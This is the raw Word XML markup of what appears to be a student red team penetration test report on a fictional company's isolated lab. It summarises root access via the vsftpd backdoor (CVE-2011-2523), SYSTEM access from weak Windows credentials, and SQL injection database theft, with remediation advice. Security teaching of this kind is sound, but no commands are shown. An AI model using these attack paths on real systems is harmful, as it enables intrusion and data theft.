        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43941319" w14:textId="78BAC794" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AD6DA4" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7253F1F5" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk215864297"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TASK 2: RED TEAM ENGAGEMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19764BDA" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ABCD Ltd — Complete Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48A9CF" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556BC416" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Executive Summary — Board Brief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E6081" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This report presents findings of a commissioned red team penetration test against the virtualised infrastructure of ABCD Ltd. The engagement simulated realistic adversary attack scenarios across the company's Linux server, Windows corporate environment, and customer-facing web application. Three critical vulnerabilities were identified and successfully exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D8E68B" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23112662" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>First, a backdoored FTP service on the Linux server (CVE-2011-2523) allowed an unauthenticated attacker to gain complete root-level administrative access with no user interaction required [3]. Second, weak administrative credentials on the Windows Server 2019 machine enabled a remote attacker to obtain NT AUTHORITY\SYSTEM access — the highest privilege on Windows — and extract all password hashes from the system [4]. Third, a SQL injection vulnerability in the web application permitted complete exfiltration of the user database, including cracked plaintext credentials, within minutes using automated tooling [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA46CE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137B3870" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>These findings represent critical business risk. Exploitation of these vulnerabilities by a real-world attacker could result in significant financial loss, regulatory penalties under UK GDPR, irreparable reputational damage, and operational disruption. Immediate remediation is strongly recommended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930CDDE" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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6"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="2808"/>
        <w:gridCol w:w="2106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="0EFBA3E6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="210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056ABCB" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="110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809652E" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Severity</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1B7B9F22" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Business Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="210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09493EB" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Action Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="4149F431"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6CB560A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>FTP Backdoor — Linux Server</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1B0B346" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</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DA3EA7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Full server compromise, data theft</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9A24550" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Patch / replace immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="3C9A2698"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29C561" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Weak Windows Credentials / No MFA</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860250" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</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E139C5D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Full domain control, credential theft</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1628BCF" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Enforce MFA, strong password policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="7CE07078"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0C75703" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SQL Injection — Web Application</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61B918" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CRITICAL</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06D7F7" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Full database breach, GDPR violation risk</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97E2B1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Parameterised queries, WAF deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="031C119C"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47B96F" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No SIEM / Log Monitoring</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A1AB51" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</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8363404" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attacks undetected, no incident response</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2766561" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Deploy centralised monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="7FF3980A"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6DC3934" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>No Network Segmentation</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8B6E30" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>HIGH</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50F004D" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Unrestricted lateral movement</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B8B7426" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VLAN segmentation, Zero Trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F1CA75A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7A202E" w14:textId="3E95AF8F" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="0016609A" w:rsidP="00AD5488">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>. Lab Environment and Network Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731830A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRDefault="00000000" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F870C5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The laboratory comprised four virtual machines within a VirtualBox Host-Only network (192.168.56.0/24), providing complete isolation. DHCP was disabled and static IPs were assigned. Snapshots were captured for each target prior to any intrusive activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE3139" w14:textId="77777777" w:rsidR="00D131DE" w:rsidRDefault="00D131DE" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D9DCC8" w14:textId="77777777" w:rsidR="00D131DE" w:rsidRPr="00F870C5" w:rsidRDefault="00D131DE" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517CFA10" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00DA689F" w:rsidP="00AD5488">
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="81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
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1638"/>
        <w:gridCol w:w="1638"/>
        <w:gridCol w:w="2042"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="09A5E7D6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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2921313" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872"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8F2A2E1" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="163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0F5F8FEC" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="163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020FFB6" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2042"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CFEE50C" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="51C2616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CBBB490" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attacker</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80ADE85" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kali Linux 2024</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4073E81" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Red Team Platform</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4F59874" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>192.168.56.102</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E67FD2" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kali Linux (Debian)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE1054" w:rsidRPr="00F870C5" w14:paraId="5ACEDFD8"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2046AD" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VM-1</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44178A" w14:textId="77777777" w:rsidR="00DA689F" w:rsidRPr="00F870C5" w:rsidRDefault="00000000" w:rsidP="00AD5488">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F870C5">
              <w:rPr>
